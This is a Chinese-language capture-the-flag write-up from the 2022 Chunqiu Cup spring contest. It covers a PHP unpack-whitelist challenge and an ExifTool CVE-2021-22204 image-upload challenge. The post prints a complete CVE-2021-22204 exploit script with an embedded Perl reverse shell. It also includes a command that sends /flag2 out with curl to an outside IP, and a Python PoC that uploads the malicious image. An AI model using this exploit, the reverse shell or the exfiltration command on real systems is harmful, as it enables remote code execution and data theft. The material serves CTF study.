2022年春秋杯网络安全联赛春季赛勇者山峰

2022年春秋杯网络安全联赛春季赛勇者山峰

easy_php

题目内容:pwner:我决定我要开始卷web了,我该怎么学呢?算了,先从基础的php开始学起吧。

index.php

 <?php
highlight_file(__FILE__);
error_reporting(0);
function createFolder($path)
{
    if (!file_exists($path)) {
        createFolder(dirname($path));
        mkdir($path, 0777);
    }
}

function savePostData()
{
    $content = $GLOBALS['HTTP_RAW_POST_DATA'];
    if (empty($content)) {
        $content = file_get_contents('php://input');
    }
    if ($content == null) {
        exit(0);
    }
    $format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen';
    $head = unpack("$format", $content);
    unset($format);
    $format = 'lnDataLen/lnHeadLen/lnPackTotal/lnPackNum/lnFileNameLen/lnFileDataLen' . '/a' . ($head["nFileNameLen"]) . 'chFileName' . '/a' . ($head["nFileDataLen"]) . 'data';
    $head = unpack("$format", $content);
    if (is_string($head["chFileName"])) {
        $fileName = $head["chFileName"];
        $white_func = array("readfile","unserialize","phpinfo");
        if (!in_array($fileName, $white_func)) {
            exit("hi hack!");
        }
        $fileName($head["data"]);
    }
    echo "FAIL";
}
savePostData();
?> 

得到构造相应的unpack数据的方法

<?php
function savePostData($fn,$data)
{
    $datalen=strlen($data);
    $fnlen=strlen($fn);
    $content=pack("l6a".$fnlen."a".$datalen,1,2,3,4,$fnlen,$datalen,$fn,$data);
    var_dump(urlencode($content),strlen($content));
}
$white_func = array("readfile","unserialize","phpinfo");
savePostData($white_func[2],'99999');

将得到的数据在burp的6进制页面逐个插入字符

image-20220507203800953

image-20220507203851849

很奇怪,在本地读取文件的readfile在本地测试可以正常输出文件,但是在题目里使用readfile并不能读出文件,不知道什么问题。。。。

image-20220507224601213

bash CVE-2021-22204.sh "system('ls -al /> /tmp/1')" poc2.jpg && python3 1.py 

bash CVE-2021-22204.sh "system('curl -F "file=@/flag2" 47.99.70.18:4444')" poc2.jpg && python3 1.py

一道python,名字叫啥不记得了

只出了exif漏洞的一半flag(/flag1)还有一半flag是convert漏洞的没做出来,网上下了很多POC都没反应(其实exif漏洞也是,最后找到下面这个可用脚本):

#!/bin/bash

RS='\033[0m'
R='\033[0;31m'
G='\033[0;32m'
LB='\033[1;34m'
CY='\033[0;36m'
W='\033[1;73m'

art=$(base64 -d <<< "H4sIAFNGCWEA/52OMRLEIAwD+7xiy1Dxm6s8w0f8+KxyUFx7eGQhodgBVs4viy8ptz5Qx75gqoqSc2sLBtRLHcfLgX6TusTtmOLDbEytlQn3yCATW5/Sz6DVbizf2j7fVDPteiHX+0f5diM+5rLxz/MATvFQnxwBAAA=" | gunzip)
printf "${G}$art${RS}"

# Check for params
if [ ${#@} -lt 2  ]; then
    echo -e "\nUsage: ./CVE-2021-22204 cmd image.jpg"
    echo -e "Eg: ./CVE-2021-22204 \"system('id')\" kitten.jpg" 
    echo -e "Reverseshell: ./CVE-2021-22204 \"reverseme IP PORT\" image.jpg"
    exit
fi

# Check djvulibre is installed. 
if [ $(dpkg-query -W -f='${Status}' "djvulibre-bin" 2>/dev/null | grep -c "ok installed") -eq 0 ];then
    echo -e -n "\n${R}Warning:${RS} djvulibre-bin is not installed.\n"
    echo -e "${G}Confirm: ${RS}"
    read -p  "Install djvulibre-bin now? (y/n): " confirm
    if [[ ${confirm} =~ ^([yY][eE][sS]|[yY])$  ]]; then
        sudo apt-get install djvulibre-bin -y
    else
        exit
    fi
fi

# Create payload
echo -e "\nCreating payload"

cmd="$1"

if [[ "${cmd:0:9}" = "reverseme" ]]; then
        ip=$(echo "$cmd"| cut -d " " -f 2)
        port=$(echo "$cmd"| cut -d " " -f 3)
        echo "IP: $ip"
        echo "PORT: $port"
cat <<EOF> payload
(metadata "\c\${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in($port,inet_aton('$ip')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};};")
EOF

else
cat <<EOF > payload
(metadata "\c\${$1};")
EOF
fi

cat payload
echo -e "\n"

# Compress payload
bzz payload payload.bzz

# INFO = Anything in the format 'N,N' where N is a number
# BGjp = Expects a JPEG image, but we can use /dev/null to use nothing as background image
# ANTz = Will write the compressed annotation chunk with the input file
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz

cat <<EOF> configfile
%Image::ExifTool::UserDefined = (
    # All EXIF tags are added to the Main table, and WriteGroup is used to
    # specify where the tag is written (default is ExifIFD if not specified):
    'Image::ExifTool::Exif::Main' => {
        # Example 1.  EXIF:NewEXIFTag
        0xc51b => {
            Name => 'HasselbladExif',
            Writable => 'string',
            WriteGroup => 'IFD0',
        },
        # add more user-defined EXIF tags here...
    },
);
1; #end%
EOF

exiftool -config configfile '-HasselbladExif<=exploit.djvu' "$2"
rm configfile payload.bzz payload exploit.djvu

echo -e -n "\n${G}Finished${RS}"

得到前半段flag的poc:

import os,sys
import threading
import requests

url="http://eci-2ze4iv6httpb9dlwbvru.cloudeci1.ichunqiu.com:8888"
session=requests.session()
# cmd=sys.argv[1]
# os.system(f"bash CVE-2021-22204.sh \"{cmd}\" poc2.jpg")
file=open("poc2.jpg","rb").read()
files = [
    ('file', ('curl4444.jpg', file, 'image/jpeg')),
]
print(session.post(url + "/upload", files=files).text)
print(session.get(url+"/info").text)
print(session.get(url+"/convert").text.split('"')[-2])
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇